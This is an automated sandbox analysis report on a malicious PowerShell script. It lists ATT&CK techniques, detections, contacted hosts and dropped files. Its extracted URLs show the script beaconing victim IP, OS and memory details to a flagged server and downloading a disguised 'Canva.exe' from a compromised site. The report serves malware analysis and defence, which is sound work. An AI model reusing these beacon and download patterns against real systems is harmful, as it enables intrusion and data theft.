Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\oNvY66Z8jp.ps1 VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Modify Registry		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Install Root Certificate		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
oNvY66Z8jp.ps117%ReversingLabs
oNvY66Z8jp.ps115%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://91.206.178.120:5001/script_end?random_number=$randomNumber100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=91530100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=100%Avira URL Cloudmalware
http://91.206.178.120:5001100%Avira URL Cloudmalware
http://api.ipify8r0%Avira URL Cloudsafe
http://91.206.178.120:5001/script_end?random_number=91530$M100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra100%Avira URL Cloudmalware
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search0%Avira URL Cloudsafe
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft100%Avira URL Cloudmalware
https://hostelaunpaso.com/wp-cont0%Avira URL Cloudsafe
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m100%Avira URL Cloudmalware
https://hostelaunpaso.commd0%Avira URL Cloudsafe
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    		high
    hostelaunpaso.com
    		172.67.149.252
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530true
      • Avira URL Cloud: malware
      		unknown
      http://api.ipify.org/false
        		high
        https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exetrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://91.206.178.120:5001/script_end?random_number=91530powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://91.206.178.120:5001/script_end?random_number=$randomNumberpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1false
              • Avira URL Cloud: malware
              		unknown
              https://go.micropowershell.exe, 00000000.00000002.2176348749.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://91.206.178.120:5001/script_end?random_number=powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://91.206.178.120:5001/script_end?random_number=91530$Mpowershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://api.ipify.org/P&powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://api.ipify.org/ppowershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://91.206.178.120:5001/script_start?ip=powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://91.206.178.120:5001powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://api.ipify8rpowershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.ipify.orgnotepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1false
                            		high
                            https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/searchpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1false
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$rapowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1false
                            • Avira URL Cloud: malware
                            		unknown
                            https://hostelaunpaso.com/wp-contpowershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoftpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mpowershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://contoso.com/powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://hostelaunpaso.commdpowershell.exe, 00000000.00000002.2176348749.0000000004A03000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.26.12.205
                                    		api.ipify.orgUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    91.206.178.120
                                    		unknownPoland
                                    		200088ARTNET2PLtrue
                                    172.67.149.252
                                    		hostelaunpaso.comUnited States
                                    		13335CLOUDFLARENETUStrue

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1617746
                                    Start date and time:2025-02-18 08:26:34 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:oNvY66Z8jp.ps1
                                    renamed because original name is a hash value
                                    Original Sample Name:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d.ps1
                                    Detection:MAL
                                    Classification:mal80.troj.winPS1@3/7@2/3
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 88%
                                    • Number of executed functions: 30
                                    • Number of non-executed functions: 9
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    02:27:28API Interceptor46x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    104.26.12.205Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    [Huawei] Contract for YouTube partners.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    lO5lV39HDj.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                    • api.ipify.org/
                                    SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    55ryoipjfdr.exeGet hashmaliciousTrickbotBrowse
                                    • api.ipify.org/
                                    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                    • api.ipify.org/
                                    91.206.178.120Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 91.206.178.120:5001/script_end?random_number=66350

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    api.ipify.orgPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    SecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 104.26.12.205
                                    LmIclOjfqc.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    http://account-5036237.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    http://account-5078804.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    https://business.accounts-security-center-overview.com/caseGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                    • 172.67.74.152
                                    https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                    • 104.26.12.205
                                    DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    [Huawei] Contract for YouTube partners.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                    • 104.21.16.1
                                    jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.64.1
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.22.74.216
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.74.232
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.18.27.193
                                    FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.32.1
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.18.27.193
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.23.234
                                    CLOUDFLARENETUSPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    Kariny CV.vbsGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                    • 104.21.16.1
                                    jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.64.1
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.22.74.216
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.74.232
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.18.27.193
                                    FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.32.1
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 104.18.27.193
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.23.234
                                    ARTNET2PLPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 91.206.178.120
                                    4Osfx7gnSx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 185.104.113.237
                                    fqJIOoSp5U.dllGet hashmaliciousUnknownBrowse
                                    • 91.206.178.125
                                    QZzvG5G6VE.exeGet hashmaliciousStealcBrowse
                                    • 91.206.178.118
                                    mrkjKujfkP.exeGet hashmaliciousStealcBrowse
                                    • 91.206.178.118
                                    vR19oQpY8c.exeGet hashmaliciousStealcBrowse
                                    • 91.206.178.118
                                    sql.tmp.dll.dllGet hashmaliciousUnknownBrowse
                                    • 91.206.178.125
                                    UrQrIdRfCg.exeGet hashmaliciousUnknownBrowse
                                    • 185.104.112.62
                                    http://tldbonak.comGet hashmaliciousUnknownBrowse
                                    • 91.206.178.97
                                    7ECHtNYRdu.exeGet hashmaliciousVidarBrowse
                                    • 185.104.114.24

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ePmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    Commercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252
                                    Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                    • 172.67.149.252

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2704
                                    Entropy (8bit):5.420017244578641
                                    Encrypted:false
                                    SSDEEP:48:AKYNSU4y4RQmFoUeWmfmZ9tK8NTXGiR80xnqvq8kyUbaImx10ln0zJ6JAwqgt:AvkHyIFKL3OZ2KTXGib2kyGaImM0d6JZ
                                    MD5:9AC6DD09BEBA8A0C84F58C8D81E67273
                                    SHA1:2CBD4ADD18815DA890B629171165978D2DED2550
                                    SHA-256:BABB9DBB4F1B96790591A332F83BFCAD04BD4641C21FBEEDA59182CB35678392
                                    SHA-512:84FE85F7B27E05F302084CC91C85EC58A0C7FA1D82CA1ED417153DD6119DD1C86712BC814FD4B8EA60569CE1912A9D01003B0CF07B5B168D478AF65520D23D04
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e................................................@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kazbunur.vqp.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otxbg1dy.nwk.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqjwg5ks.3sl.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjq2jtso.1ee.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\STMTHOOLRNEY7BAM6KK4.temp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.710920439852509
                                    Encrypted:false
                                    SSDEEP:48:JOWWCjCPbU2K+DjukvhkvklCywDn22Yfpy+L7BNSogZoKWYfpy+L7BNSogZo+1:gW/jCooWkvhkvCCt+fpJLSHlfpJLSH5
                                    MD5:087818FF8B36CF500519D9FE7A2FDE34
                                    SHA1:8CFBCF2581BCC3B460048FBCDD08F7EF3352122A
                                    SHA-256:35052500F334A9BE165A70A9869CF29102CB51FB52C4C00157CA6D2B071DFB83
                                    SHA-512:0E5E90D4EEE735E85AE314705044FCC5DCDC720EBABAC211AAD193D994E2E09CEC990AFC50FA0AE02FB0AA52D6D913C822CD0E04BEF2FB4644DCCC50F205C692
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M...........|........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlRZh;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....RZk;..Roaming.@......DWSlRZk;....C.....................Up..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlRZh;....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSlRZh;....E......................*..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlRZh;....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlRZh;....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

